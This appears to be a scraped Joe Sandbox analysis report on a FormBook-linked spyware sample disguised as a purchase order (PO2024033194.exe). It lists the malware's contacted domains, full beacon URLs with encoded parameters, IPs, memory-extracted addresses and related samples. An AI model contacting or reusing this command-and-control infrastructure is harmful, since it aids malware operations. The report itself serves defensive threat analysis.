                                		truefalse
                                  		unknown
                                  www.rtpngk.xyz
                                  		188.114.96.3
                                  		truetrue
                                    		unknown
                                    kovallo.cloud
                                    		81.2.196.19
                                    		truefalse
                                      		unknown
                                      ghs.googlehosted.com
                                      		142.250.185.115
                                      		truefalse
                                        		unknown
                                        ks1x7i.vip
                                        		3.33.130.190
                                        		truefalse
                                          		unknown
                                          www.les-massage.online
                                          		194.58.112.174
                                          		truefalse
                                            		unknown
                                            www.warriorsyndrome.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.deefbank.net
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.kovallo.cloud
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.pakmartcentral.shop
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.wcq24.top
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.galaxyslot88rtp.lat
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.asociacia.online
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.tracy.club
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.sppsuperplast.online
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.ks1x7i.vip
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://www.tracy.club/fl4z/?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ks1x7i.vip/uxh9/?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI=false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.moritynomxd.xyz/v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA=false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.wcq24.top/i557/?azq=fdKL&i4fTbV=r5xTDTq+P/dmGc23aTYP++6vD4IIXl1qT9Awk095V47k3JGT99IqetoKvxAOeL2EPogdFWvWqA7DbFw7qeor8ymW97eZJYTdZjDdM43a/Prut01z/AyWNItbEAzthb57mHY0hv0=false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.warriorsyndrome.net/kzas/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.sppsuperplast.online/becc/?azq=fdKL&i4fTbV=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1rIFAvnCnNucMsmrQXs06QWDt4JmjDj2SCXWkqqyO9GVL4EIVQqM=false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.cc101.pro/4hfb/?i4fTbV=p0fiPEbR7h0D1ZUOfVsjdEWFV3Vqdd7ztt+ba1ipU50QpLeGbsfhVX/xlcry6cJcaLbXkWa/uL73QIBTv0okvOs18q2MWzQBAuyEy9gJ3iqXHcMZDpxJS19wj2EcV+2vhba8AVQ=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.warriorsyndrome.net/kzas/?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ks1x7i.vip/uxh9/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.pakmartcentral.shop/ml5l/?i4fTbV=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7gZ0oLWeUJsJ7Z2tBEY1sQX9lUVfuGDuLcfeu3lFclf66FPfUGcc=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.les-massage.online/74ou/?i4fTbV=3mmMrs1mHi0xtqaDMxx5sGmAfYwz3fKeAP6hfCImDXgoS2DvTlMdmK0EBclDVq+276a7o9Kf0aGsTEl5XVQUxBF2OIg1GqwvGg+sN+gOtZPXTMPeHtLoUfm2FHWRrzdI/h6GADA=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.galaxyslot88rtp.lat/lbpf/?azq=fdKL&i4fTbV=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK96Mq7ReyrRgsD03neHbuXRNiEyhMf3k5eUDWFdm02mW+aOnIw8Rk=false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.galaxyslot88rtp.lat/lbpf/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.rtpngk.xyz/876i/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.wcq24.top/i557/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.pakmartcentral.shop/ml5l/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.sterkus.xyz/ha8h/?i4fTbV=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX61WMZ5CKSP5Ywj/pBJKYAqDUZeWyiIAYv47gxX4Wz9AjmXGPf0TM=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.asociacia.online/bf6k/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.tracy.club/fl4z/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.kovallo.cloud/kmgk/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.sppsuperplast.online/becc/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.sterkus.xyz/ha8h/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.deefbank.net/1y6y/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.syncnodex.net/xx1z/?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.syncnodex.net/xx1z/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.asociacia.online/bf6k/?i4fTbV=WmuOVz+RC0WxuKvAKjLazsuJSut05UnIYH9cvZCoa2K6/WBiXNRHwXvjS8aBoIFx3RUgrEeQYXBh1DGCvEwoQM3mycAsC54rxjYGxDtBM8eA6E3stZW6KS9LpBS51Lfr66nx40w=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.kovallo.cloud/kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKLfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.cc101.pro/4hfb/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.les-massage.online/74ou/false
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                URLs from Memory and Binaries

                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://htmlcodex.comdrBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://duckduckgo.com/chrome_newtabreplace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://duckduckgo.com/ac/?q=replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://reg.rudrBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cdn.jsdelivr.net/npm/bootstrapdrBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.deefbank.netdrBzjAnGBElC.exe, 00000003.00000002.4633344393.000000000822E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://156.226.108.98:58888/drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000075EE000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4629372081.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000058FE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.reg.ru/dedicated/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_ladrBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_autodrBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpdrBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007912000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005C22000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/web-sites/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_ladrBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoreplace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.cssdrBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://parking.reg.ru/script/get_domain_data?domain_name=www.les-massage.online&rand=drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://code.jquery.com/jquery-3.4.1.min.jsdrBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.ecosia.org/newtab/replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://cdn.jsdelivr.net/npm/bootstrap-iconsdrBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/domain/new/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_ldrBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://t.me/AG09999drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000075EE000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4629372081.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000058FE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/web-sites/website-builder/?utm_source=www.les-massage.online&utm_medium=parking&udrBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/hosting/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_landdrBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.rtpngk.xyz/876i/?i4fTbV=KmywdrBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000072CA000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000055DA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://htmlcodex.com/credit-removaldrBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                209.74.95.29
                                                                		www.sterkus.xyzUnited States
                                                                		31744MULTIBAND-NEWHOPEUStrue
                                                                84.32.84.32
                                                                		pakmartcentral.shopLithuania
                                                                		33922NTT-LT-ASLTfalse
                                                                81.2.196.19
                                                                		asociacia.onlineCzech Republic
                                                                		24806INTERNET-CZKtis238403KtisCZfalse
                                                                85.159.66.93
                                                                		natroredirect.natrocdn.comTurkey
                                                                		34619CIZGITRfalse
                                                                172.81.61.224
                                                                		www.moritynomxd.xyzUnited States
                                                                		22552ESITEDUStrue
                                                                142.250.185.115
                                                                		ghs.googlehosted.comUnited States
                                                                		15169GOOGLEUSfalse
                                                                188.114.97.3
                                                                		www.cc101.proEuropean Union
                                                                		13335CLOUDFLARENETUSfalse
                                                                188.114.96.3
                                                                		www.rtpngk.xyzEuropean Union
                                                                		13335CLOUDFLARENETUStrue
                                                                46.17.172.49
                                                                		galaxyslot88rtp.latGermany
                                                                		47583AS-HOSTINGERLTfalse
                                                                154.23.184.240
                                                                		wcq24.topUnited States
                                                                		174COGENT-174USfalse
                                                                194.58.112.174
                                                                		www.les-massage.onlineRussian Federation
                                                                		197695AS-REGRUfalse
                                                                3.33.130.190
                                                                		tracy.clubUnited States
                                                                		8987AMAZONEXPANSIONGBfalse
                                                                15.197.172.60
                                                                		www.syncnodex.netUnited States
                                                                		7430TANDEMUSfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1515416
                                                                Start date and time:2024-09-22 17:39:44 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 11m 8s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:PO2024033194.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@16/13
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 92%
                                                                • Number of executed functions: 48
                                                                • Number of non-executed functions: 306
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: PO2024033194.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                11:41:27API Interceptor10766323x Sleep call for process: replace.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                209.74.95.29PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                • www.pofgof.pro/gfz9/
                                                                84.32.84.32RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                • www.pakmartcentral.shop/vjx2/
                                                                DHL Arrive Notice doc pdf.exeGet hashmaliciousFormBookBrowse
                                                                • www.qriem.com/2tnc/
                                                                SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                                                                • www.dfmagazine.shop/wc8m/?In3=AzvpidDp&6JAhxhQ=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZgLMwl2zsPPksSh5ucr6CA17E1wkvEUc1n0CmK9rdseNyUg==
                                                                2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • www.servehimfoundation.org/lp08/?mnShvP=hZRrlAOg9Cc11yMPXElysVdslrUOxqPvxv7mb/LWN/R8ZQj+E9ZrTE6ldQgl2DvoxGl0EVvUl/xss71F3eAnCvB+UJch5C5oTNbGviL38V1Dt27EfV1x4H4=&Cbj=nB9LWdWpMT7tUBt
                                                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • www.glintra.cyou/eaxv/
                                                                PO76389.exeGet hashmaliciousFormBookBrowse
                                                                • www.parcelfly.net/n59g/
                                                                k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                                • www.glitterinthegrey.shop/rei7/
                                                                SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                                • www.parcelfly.net/n59g/
                                                                SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                                • www.servehimfoundation.org/lp08/
                                                                RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                                                • www.dfmagazine.shop/wc8m/?kxfp9=-6Mh&oXfTz=LNw/HBPP4tr5bvxRp17Hk/kExWr2oyZ3YB7NlE9rWxPCxu7fGi7WVymEaD0ez69xv6ZMfJiRCRJpj+4TPiEl4bd+hmDlK6IeawRubruAKHje0xl8dFknm0izH9S6
                                                                81.2.196.19SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                • www.asociacia.online/jsqu/
                                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • www.asociacia.online/onev/
                                                                Sandflugters.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.efektivniterapie.online/tsq7/
                                                                SSCTEC9201.exeGet hashmaliciousFormBookBrowse
                                                                • www.sedrik-osvald.online/m2x5/?YvT=KDH4Ppt8a8oLaN3p&v2J=B8Bd0Sfq77kDc24XyFdDXGPlMrQ7NxXLrTlUZzrnlAP4fhGKbqg2y3GNcrlB5q+LumL4VPx44Q==
                                                                ACH PAYMENT 1192022pdf.exeGet hashmaliciousFormBookBrowse
                                                                • www.maku-pro.online/ma27/?j2=jNDy8wSiFoz7se3IREk5N364hjCCwoYyTNWUbGZMTg86DNUHcq3c8A2kAWt7EWCkv4mkH3c4vQ==&-Zc=-ZAdTpT8Cf
                                                                07aTSiH01G.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.kittycatastrophe.com/ne6z/?0N60=e0GlN6KPU&A8SD=Y2A11byKZUZMS1hlf842E/RmyAMNscsVAGalVIqYPZA3++Uv5dXsl8O0tdZQsiHykM3ibVkf+qS9xpnv2GfFKJmS01C8pP3vIQ==
                                                                PO97421800.exeGet hashmaliciousFormBookBrowse
                                                                • www.kittycatastrophe.com/qdv3/?4hy8Q8=JsWBh0Ouo7iPrZeVkgjgpsCxrRXN8DZIPDwfqT3tUakaQF1R0vva/x4hhD3n5plmuauGyWTPBUUElkC9ZpnHKzdpRh7hqvzJNpujLQ+xVQPe&2dv8Z=S6A8sb4P3nm
                                                                IMG_101922.exeGet hashmaliciousFormBookBrowse
                                                                • www.kittycatastrophe.com/ne6z/?n2MxbD=v4Il9BC&3fi=Y2A11byKZUZMS1hlf842E/RmyAMNscsVAGalVIqYPZA3++Uv5dXsl8O0tdZQsiHykM3ibVkf+qS9xpnv2GfFKJmS01C8pP3vIQ==
                                                                PO#20990_Sept_Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.rezidencecechovaprerov.online/de28/?i87=17vDC5FFQTPlGizA74Ak55na4DsykkDYnEC/uJJ+zVbbU9ytZo1iO4RKjN84/27APiYJ&3f=9r9l2h3
                                                                Updrag.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.avatame.online/niku/?7nFlllx=3VrQF/tRbPjx73bOmiQ5cPIn9APV2F2cudNZi8mITKQESaOmZwkUkGMRo6DTdBgPja21K7lwwmql7y5TVUc0R+3pGNAdhu+75g==&u4=UvZXQxCPphTT6J

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.cc101.proPURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                • 188.114.96.3
                                                                natroredirect.natrocdn.comFvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                Quote 05-302.lnkGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                www.rtpngk.xyzDOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                                • 188.114.97.3
                                                                www.moritynomxd.xyzncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • 172.81.61.224
                                                                www.les-massage.onlinencOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • 194.58.112.174

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                NTT-LT-ASLTRECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 84.32.84.32
                                                                DHL Arrive Notice doc pdf.exeGet hashmaliciousFormBookBrowse
                                                                • 84.32.84.32
                                                                SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                                                                • 84.32.84.32
                                                                2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 84.32.84.32
                                                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • 84.32.84.32
                                                                Fatura.pdfGet hashmaliciousUnknownBrowse
                                                                • 84.32.84.32
                                                                GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                • 84.32.84.196
                                                                PO76389.exeGet hashmaliciousFormBookBrowse
                                                                • 84.32.84.32
                                                                k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                                • 84.32.84.32
                                                                SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                                • 84.32.84.32
                                                                CIZGITRFvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                Ziraat Bankas#U0131 Swift Mesaj#U0131.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 185.22.186.213
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                file.exeGet hashmaliciousFormBookBrowse
